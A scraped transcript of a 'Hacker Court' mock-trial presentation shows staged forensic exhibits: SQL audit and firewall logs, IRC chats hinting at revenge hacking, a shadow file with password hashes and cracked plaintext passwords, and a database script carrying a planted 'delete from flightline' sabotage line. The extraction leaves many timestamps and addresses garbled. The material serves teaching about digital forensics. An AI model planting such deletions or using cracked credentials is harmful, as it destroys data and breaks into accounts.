Presentation is loading. Please wait.

Presentation is loading. Please wait.

Hacker Court Carole Fennelly, Jonathan Klein, Richard Salgado, Jesse Kornblum, Don Cavender, Rebecca Bace, William Tafoya, Richard Thieme, Jennifer Granick,

Similar presentations


Presentation on theme: "Hacker Court Carole Fennelly, Jonathan Klein, Richard Salgado, Jesse Kornblum, Don Cavender, Rebecca Bace, William Tafoya, Richard Thieme, Jennifer Granick,"— Presentation transcript:

1 Hacker Court Carole Fennelly, Jonathan Klein, Richard Salgado, Jesse Kornblum, Don Cavender, Rebecca Bace, William Tafoya, Richard Thieme, Jennifer Granick, Brian Martin, Kevin Manson, Simple Nomad & Jack Holleran

2 Jonathan Klein – Defense Expert Witness Jennifer Granick – Counsel for the Defendant Richard Thieme – The owner of one of the victims, Richard’s Air Transport Company Brian Martin – The Defendant Jack Holleran – Oscar J. Simpson, senior system administrator for RATCOM Jesse Kornblum – Special Agent for the Air Force Office of Special Investigations Don Cavender – investigative special agent from the FBI Richard Salgado – represents the people Rebecca Bace – Judge Judith Chamberlain Wapner (presiding judge)

3

4 ass (ejones) bank (lgeorge) bite (ddrago) boy (rjones) bye (mjones) cat (rthieme) chair (rbottom) creep (pklutz) cross (pprop) cry (kkruk) date (kstern) day (kkluk) dog (asmith) eat (lchan) fade (ldoor) friend (fsmith) gate (cchan) gin (mstein) girl (lsmith) goat (tjones) got (pstein) green (mschwartz)

5 Nov 15 16: FLIGHT=PROD SQL results from auditlog_flight_dump.sql Time: 20: :28 Page 1 Action USERNAME Hostname Audit_Date_And_Time OLD_DATA NEW_DATA I dbo TOWER Oct :29:16 Null VALUE I dbo TOWER Oct :38: I dbo TOWER Oct :49:18 D I dbo TOWER Oct :02:18 Y I dbo TOWER Oct :05: I dbo TOWER Oct :39: I dbo TOWER Oct :49: D dbo TOWER Oct :47:38 RATCO D dbo TOWER Oct :49:17 RATCOM U dbo TOWER Oct :51:18 01/01/ /01/2002 I dbo TOWER Oct :52:18 01/01/ /15/2021 I dbo TOWER Oct :59:18 01/01/ /15/2002 I dbo TOWER Oct :09:18 V I dbo TOWER Oct :13:23 USD I dbo TOWER Oct :14:18 USD U dbo TOWER Oct :15:37 01/01/ /15/2035 U dbo TOWER Oct :16:41 01/01/ /01/2001

6 D dbo TOWER Oct :17:02 RATCO D dbo TOWER Oct :19:17 RATCOM U dbo TOWER Oct :22: U dbo TOWER Oct :23:21 AX I dbo TOWER Oct :38:21 Y I dbo TOWER Oct :39:21 U dbo TOWER Oct :41: U dbo TOWER Oct :42:26 D P U msimpson TOWER Oct :43: U ojsimpson TOWER Oct :44:28 Z D dbo TOWER Oct :47:38 RATCO D dbo TOWER Oct :49:17 RATCOM U ojsimpson TOWER Oct :53:28 01/01/ /15/2035 I ojsimpson TOWER Oct :02:23 N I ojsimpson TOWER Oct :07: U acook TOWER Oct :09:04 60 I acook TOWER XCSP Oct :15: U msimpson TOWER Oct :16: D dbo TOWER Oct :17:38 RATCO D dbo TOWER Oct :19:17 RATCOM U msimpson TOWER Oct :04:51 M U msimpson TOWER Oct :06: I msimpson TOWER Oct :29:16 Null VALUE I msimpson TOWER Oct :29:18 AAA

7 U msimpson TOWER Oct :29:18 AAA U msimpson TOWER Oct :29:30 AAA U msimpson TOWER Oct :29:30 01/01/ /04/2002 I msimpson TOWER Oct :29:31 1 U acook TOWER Oct :26:01 CMBS I acook TOWER Oct :27:40 Z| | U ojsimpson TOWER Oct :38: U ojsimpson TOWER Oct :38:29 M D dbo TOWER Oct :37:38 RATCO D dbo TOWER Oct :39:17 RATCOM I ojsimpson TOWER Oct :42:29 KJR I ojsimpson TOWER Oct :48:30 N/A I dba TOWER Oct :52:45 AAA U dba TOWER Oct :02:35 AAA U dba TOWER Oct :08:11 AAA U dba TOWER Oct :09:32 AAA U dba TOWER Oct :12:23 AAA U dba TOWER Oct :13:55 AAA D dbo TOWER Oct :17:38 RATCO D dbo TOWER Oct :19:17 RATCOM U dba TOWER Oct :23:24 AAA U dba TOWER Oct :28:24 AAA

8 15 2 * 4 * /usr/local/flight/db_backup 0 2 * * * /usr/local/flight/maintenance.csh 15,45 * * * * /usr/local/flight/flightline_configuration_info.csh > /dev/null 2>&1

9 isql -Usa -S$DSQUERY -P$PASSWD >& $LOG select go print " " print "=====================" print "$DSQUERY CONFIGURATIONS" print "=====================" go sp_configure go #Roadblock 0wns U delete from flightline where flight_no like "RATCO*" print " " print "=============================" print "$DSQUERY sp_configure for Groups:" print "=============================" go END

10 Oct 23 22:08:28 guardian web-gw[7361]: permit destination /8200 ID= Oct 23 22:08:31 guardian web-gw[7371]: permit host=nodnsquery/ use of proxy ID= Oct 23 22:08:34 guardian web-gw[7371]: permit destination /8200 ID= Oct 23 22:09:35 guardian web-gw[7371]: exit host=nodnsquery/ cmds=0, in=95, out=91, duration=0, mode=Packet ID= Oct 23 22:09:38 guardian web-gw[7360]: permit host=nodnsquery/ use of proxy ID= Oct 23 22:09:40 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID= Oct 23 22:09:41 guardian web-gw[7360]: permit destination /8200 ID= Oct 23 22:10:44 guardian web-gw[7365]: permit host=nodnsquery/ use of proxy ID= Oct 23 22:10:48 guardian web-gw[7365]: permit destination /8200 ID= Oct 23 22:10:50 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID=

11 Oct 23 22:54:31 guardian web-gw[7362]: permit host=nodnsquery/ use of proxy ID= Oct 23 22:54:34 guardian web-gw[7362]: permit destination /8200 ID= Oct 23 22:54:35 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=95, out=91, duration=0, mode=Packet ID= Oct 23 22:55:38 guardian unix: securityalert: tcp if=hme1 from :1545 to on unserved port 110 Oct 23 22:55:40 guardian web-gw[7365]: exit host=nodnsquery/ cmds=0, in=88, out=92, duration=0, mode=Packet ID= Oct 23 22:55:40 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 22:55:41 guardian ftp-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 22:56:44 guardian web-gw[7360]: permit host=nodnsquery/ use of proxy ID= Oct 23 22:56:48 guardian web-gw[7360]: permit destination /8200 ID= Oct 23 22:56:50 guardian web-gw[7371]: permit host=nodnsquery/ use of proxy ID=

12 Oct 23 19:14:52 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3 Oct 23 19:34:53 tower login: [ID auth.notice] msimpson authorized for service Oct 23 20:14:55 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/4 Oct 23 20:20:57 tower login: [ID auth.notice] msimpson authorized for service Oct 23 20:37:58 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/5 Oct 23 21:04:01 tower login: [ID auth.notice] acook authorized for service Oct 23 21:10:03 tower su: [ID auth.notice] 'su root' succeeded for acook on /dev/pts/4 Oct 23 21:14:08 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3 Oct 23 22:10:11 tower login: [ID auth.notice] ojsimpson authorized for service Oct 23 22:11:14 tower su: [ID auth.notice] 'su root' succeeded for ojsimpson on /dev/pts/5 Oct 23 22:24:18 tower login: [ID auth.notice] msimpson authorized for service Oct 23 22:27:22 tower su: [ID auth.notice] 'su root' succeeded for msimpson on /dev/pts/3 Oct 23 22:29:25 tower login: [ID auth.notice] acook authorized for service Oct 23 22:34:28 tower su: [ID auth.notice] 'su root' succeeded for acook on /dev/pts/6 Oct 23 22:36:31 tower login: [ID auth.notice] msimpson authorized for service

13 isql -Usa -S$DSQUERY -P$PASSWD >& $LOG select go print " " print "=====================" print "$DSQUERY CONFIGURATIONS" print "=====================" go sp_configure go #Roadblock 0wns U delete from flightline where flight_no like "RATCO*" print " " print "=============================" print "$DSQUERY sp_configure for Groups:" print "=============================" go END

14 Speed Bump Communications (NETBLK-SB ) 1 Communcations Drive Reston, VA US Netname: SB Netblock: Coordinator: Smith, John (JS2299-ARIN) (301) Record last updated on 16-Apr Database last updated on 21-Jul :00:38 EDT.

15 rthieme:eoVxrmzba5gNw:11891:::::: asmith:moUziW.7KMLSY:11891:::::: tjones:to0lDYzyyt0Bs:11891:::::: hgray:0pz7sFqJ/goAY:11891:::::: fsmith:8p9Cjr.7iiCkM:11891:::::: bsmith:GpQ5yKAO4vOPg:11891:::::: lgeorge:NpY8j4/wdYySI:11891:::::: mjones:VphC2rx/zWLS2:11891:::::: bmartin:gpi7/g9RtoOZY:11891:::::: klee:op1halJd55/6w:11891:::::: mluther:zpT8i8yMXt2Os:11891:::::: kdean:4qcPnfVzgAHNk:11891:::::: rjones:BqsGoQ6ff18JQ:11891:::::: lsmith:HqDHnSLTSOddk:11891:::::: kstern:Pqqkz2L6M610k:11891:::::: rbottom:Wq1Nms2iF/jrM:11891:::::: prussell:lqhscgRuHeUOM:11891:::::: lgrayson:sqCXT83jP9UtY:11891:::::: cspot:.r.mhB1lBq3Gs:11891:::::: ddrago:5rgt1SQRwR3Xo:11891:::::: alee:Cr14mfLo/2J12:11891:::::: mlamb:Kr24wQM19ESxk:11891::::::

16 rthieme:x:1000:10:Richard Thieme:/opt/local/dragon:/bin/ksh asmith:x:1001:10:Angela Smith:/opt/local/dragon:/bin/ksh tjones:x:1002:10:Tom Jones:/opt/local/dragon:/bin/ksh hgray:x:1003:10:Nenry Gray:/opt/local/dragon:/bin/ksh fsmith:x:1004:10:Frank Smith:/opt/local/dragon:/bin/ksh bsmith:x:1005:10:Barbara Smith:/opt/local/dragon:/bin/ksh lgeorge:x:1006:10:Larry George:/opt/local/dragon:/bin/ksh mjones:x:1007:10:Marcus Jones:/opt/local/dragon:/bin/ksh bmartin:x:1008:10:Brian Martin:/opt/local/dragon:/bin/ksh klee:x:1009:10:Ken Lee:/opt/local/dragon:/bin/ksh mluther:x:1010:10:Martin Luther:/opt/local/dragon:/bin/ksh kdean:x:1011:10:Kathleen Dean:/opt/local/dragon:/bin/ksh rjones:x:1012:10:Roberta Jones:/opt/local/dragon:/bin/ksh lsmith:x:1013:10:Lance Smith:/opt/local/dragon:/bin/ksh kstern:x:1014:10:Kevin Stern:/opt/local/dragon:/bin/ksh rbottom:x:1015:10:Robert Bottom:/opt/local/dragon:/bin/ksh prussell:x:1016:10:Peter Russell:/opt/local/dragon:/bin/ksh lgrayson:x:1017:10:Lydia Grayson:/opt/local/dragon:/bin/ksh cspot:x:1018:10:Charles Spot:/opt/local/dragon:/bin/ksh ddrago:x:1019:10:Darren Drago:/opt/local/dragon:/bin/ksh alee:x:1020:10:Alex Lee:/opt/local/dragon:/bin/ksh mlamb:x:1021:10:Michael Lamb:/opt/local/dragon:/bin/ksh

17 tryvyhZxCk206:ass NpY8j4/wdYySI:bank 5rgt1SQRwR3Xo:bite BqsGoQ6ff18JQ:boy VphC2rx/zWLS2:bye eoVxrmzba5gNw:cat Wq1Nms2iF/jrM:chair 8spzQjq6/V9WA:creep irR72to9aPs4U:cross bs.8w7gez5Z7k:cry Pqqkz2L6M610k:date puLAs1ayn1djQ:day moUziW.7KMLSY:dog ZuDddu9uepsF6:eat gtgjyxL8bJBAM:fade 8p9Cjr.7iiCkM:friend RuO7.RU.n0juE:gate psF.DEeQIgTTI:gin HqDHnSLTSOddk:girl to0lDYzyyt0Bs:goat hsvRfcLuhR2so:got vt4dRCFbPxodk:green

18 ass (ejones) bank (lgeorge) bite (ddrago) boy (rjones) bye (mjones) cat (rthieme) chair (rbottom) creep (pklutz) cross (pprop) cry (kkruk) date (kstern) day (kkluk) dog (asmith) eat (lchan) fade (ldoor) friend (fsmith) gate (cchan) gin (mstein) girl (lsmith) goat (tjones) got (pstein) green (mschwartz)

19 Session begins 22-Oct :45:02 *** fbot has joined channel #hakchat hey fbot *** squido has joined channel #hakchat rar hi all hey squido hi squido hey bitz how goes? sucks bigtime why?! work! that asshole richard fire me and won't give me my last paycheck doh! jeez, why not? isnt that illegal? he claims i didn't give back the fucking emergency pager even tho i gave it to his secretary. bitch lost it or something so now im out a lot of money and i just got a new car isnt there something you can do?

20 howdy not like the courts will believe me. everyone would believe a big company over me why'd he fire you anyway? i was bored, portscanning some systems to see what was running. nothing bad or anything didnt give me a warning, just canned me the same day lame =( yeah, he'll pay for it one way or another afk brb ?? richard knows jack about security and never gave us time to fix the network he's still running vulnerable cgi's on the apache server, still has a few vulnerable RPC servers that are net accessable he's just begging to get hacked *hint* *cough* man, dont get in more trouble. feds come down hard on you for that shit. FBI are complete assclowns i know, i'm just saying... could happen gotta run hasta doh stepped afk, see ya rblock

21 Session begins 25-Oct :00:15 *** squido has joined channel hey squido! rar hi all hey rblock =) hehehe check this out richard (ex boss dickhead) mysteriously got hacked >=)... *** stalkin has joined channel tell me you didn't! oh err uhm, i didnt! didn't what? why don't i believe you... <-- innocent! hehehe i just heard through the grapevine ole richard ran into a lot of problems. apparently one of his servers ran into problems.... or so i hear <- lost in this conversation evil evil man! <-- innocent! *snicker*

22 Session begins 18-Jun :03:20 gah i'm tired of work shit why now? i'm tired of these little script kiddie assholes day in and day out they run the most inane crap against my network bitch all you want, but they know more than you often and they keep yer ass employed stfu prymate, quit defending your script kiddy brethren d00d you know shit, you are shit /yawn, when you hit puberty feel free to come knocking, until then keep working on your wet dreams kid this coming from a l4m3r admin who been owned be4 sure sure, and your impressive advisories on russian CGI packages used by four people worldwide sure qualify you as a security expert d00d fuck u and stfu or ill 0wn u hard i think you'd have a hard time owning mommy and daddy at a PTA meeting kid remember this asshole *** Signoff: prymate (f u rblock)

23 Oct 23 22:45:22 guardian web-gw[7371]: exit host=nodnsquery/ cmds=0, in=96, out=92, duration=0, mode=Packet ID= Oct 23 22:45:25 guardian web-gw[7370]: permit host=nodnsquery/ use of proxy ID= Oct 23 22:46:28 guardian web-gw[7370]: permit destination /8200 ID= Oct 23 22:46:31 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=85, out=89, duration=0, mode=Packet ID= Oct 23 22:46:34 guardian web-gw[7362]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 22:47:35 guardian unix: securityalert: tcp if=hme1 from :1545 to on unserved port 110 Oct 23 22:47:38 guardian web-gw[7360]: permit host=nodnsquery/ use of proxy ID= :wq Oct 23 22:47:40 guardian web-gw[7360]: permit destination /8200 ID= Oct 23 22:48:41 guardian web-gw[7365]: permit host=nodnsquery/ use of proxy ID=

24 Oct 23 01:09:55 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID= Oct 23 02:14:52 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 03:21:48 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID= Oct 23 04:18:41 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 05:04:38 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID= Oct 23 05:27:34 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 05:50:28 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID= Oct 23 06:12:22 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 06:35:14 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID= Oct 23 07:00:08 guardian tn-gw[1199]: exit host=nodnsquery/ cmds=0, in=93, out=89, duration=0, mode=Packet ID= Oct 23 08:06:01 guardian tn-gw[1199]: permit host=nodnsquery/ use of proxy ID=

25 if ($DSQUERY == "PROD" || $DSQUERY == "DENVER" || $DSQUERY == "BETA" || $DSQUERY == "PRODNEW" || $DSQUERY == "BETANEW") then set PASSWD = `cat $SYBASE/magicword` else if ($DSQUERY == "SYSTEM12") then set PASSWD = `cat $SYBASE/magicword.SYSTEM12` else if ($DSQUERY == "CMFPROD") then set PASSWD = `cat $SYBASE/magicword.CMFPROD` else if ($DSQUERY == "PORTIAPROD") then set PASSWD = `cat $SYBASE/magicword.PORTIAPROD` else set PASSWD = `cat $SYBASE/magicword.TEST` endif echo `date`" JOB: $DSQUERY sybase_configuration_info.csh" >>&! $LOG echo `date`" FILE: $LOG" >>&! $LOG echo " " >> $LOG echo `date`" Getting Configuration Information for $DSQUERY Server..." >> $LOG echo " " >> $LOG

26 Registrant: Richard A. Thieme Transport Company (RATCO-DOM) 999 State St Falls Church, VA US Domain Name: RATCO.COM Administrative,Technical and Billing Contact: Thieme, Richard (RT2229) 999 State St Falls Church, VA US (301) (FAX) (301) Record expires on 17-Aug Record created on 16-Aug Database last updated on 22-Jul :33:20 EDT. Domain servers in listed order: NS1.SPEEDBUMP.COM NS2.SPEEDBUMP.COM

27 Registrant: SpringField International Airport(SIA-DOM) 1 Flight Drive SpringField, MD US Domain Name: SIA.COM Administrative, Technical Contact: Simpson, Oscar J. (OS239) SpringField International Airport 1 Flight Drive SpringField, MD (301) (FAX) (301) Record expires on 17-Aug Record created on 16-Aug Database last updated on 22-Jul :33:20 EDT. Domain servers in listed order: NS1.MSN.COM NS2.ATT.NET

28 Registrant: Speed Bump Communications(SPEED-DOM) 1 Communications Drive Reston, VA US Domain Name: SPEEDBUMP.COM Administrative Contact: Smith, John (JS2299) Speed Bump Communications 1 Communications Drive Reston, VA (301) (FAX) (301) Technical Contact: Jones, Anthony (AJ9999) 1 Communications Drive Reston, VA (301) (FAX) (301) Record expires on 17-Aug Record created on 16-Aug Database last updated on 22-Jul :33:20 EDT. Domain servers in listed order: NS1.SPEEDBUMP.COM NS2.SPEEDBUMP.COM


Download ppt "Hacker Court Carole Fennelly, Jonathan Klein, Richard Salgado, Jesse Kornblum, Don Cavender, Rebecca Bace, William Tafoya, Richard Thieme, Jennifer Granick,"

Similar presentations


Ads by Google